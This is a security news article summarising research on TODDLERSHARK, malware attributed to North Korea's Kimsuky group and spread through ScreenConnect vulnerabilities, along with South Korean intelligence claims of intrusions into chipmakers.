Threat actors from North Korea have been using the recently discovered security holes in ConnectWise ScreenConnect to spread a brand-new piece of malware known as TODDLERSHARK.

Research published by Kroll with The Hacker News claims that TODDLERSHARK shares similarities with well-known Kimsuky malware, including BabyShark and ReconShark.

Security researchers Dave Truman, George Glass, and Keith Wojcieszek stated that “the threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application. They then leveraged their now 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”

The aforementioned ConnectWise vulnerabilities, identified as CVE-2024-1708 and CVE-2024-1709, were discovered last month and have since been extensively exploited by various threat actors to distribute ransomware, stealer malware, cryptocurrency miners, and remote access Trojans.

APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, KTA082, Nickel Kimball, and Velvet Chollima are some aliases that Kimsuky goes by. It has been adding additional tools to its malware arsenal throughout time, the most recent being GoBear and Troll Stealer.

When BabyShark is launched, an HTML Application (HTA) file is used. It was originally found in late 2018. After it is run, the malware known as VB script stays on the system, waits for more instructions from the operator and exfiltrates system data to a Command-and-Control (C2) server.

Then, in May 2023, it was noticed that a BabyShark variation called ReconShark was being sent through spear-phishing emails to those who had been particularly targeted. Because of TODDLERSHARK's coding & behavior, it is believed to represent the most recent evolution of the same malware.

In addition to employing a scheduled job for persistence, the malware is designed to obtain and exfiltrate private data from the affected computers, serving as an effective reconnaissance instrument.

THE TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments,” according to the researchers.

The development coincides with accusations made by the National Intelligence Service (NIS) of South Korea against its northern equivalent for reportedly breaking into the servers of two domestic semiconductor manufacturers, who have not been named, and stealing sensitive information.

The cyberattacks happened in February 2024 and December 2023. According to reports, the threat actors first gained access to servers that were accessible to the internet and were deemed susceptible. To avoid detection, they used Living-off-the-Land (LotL) tactics instead of dumping malware.

“North Korea may have begun preparations for its production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles,” NIS stated.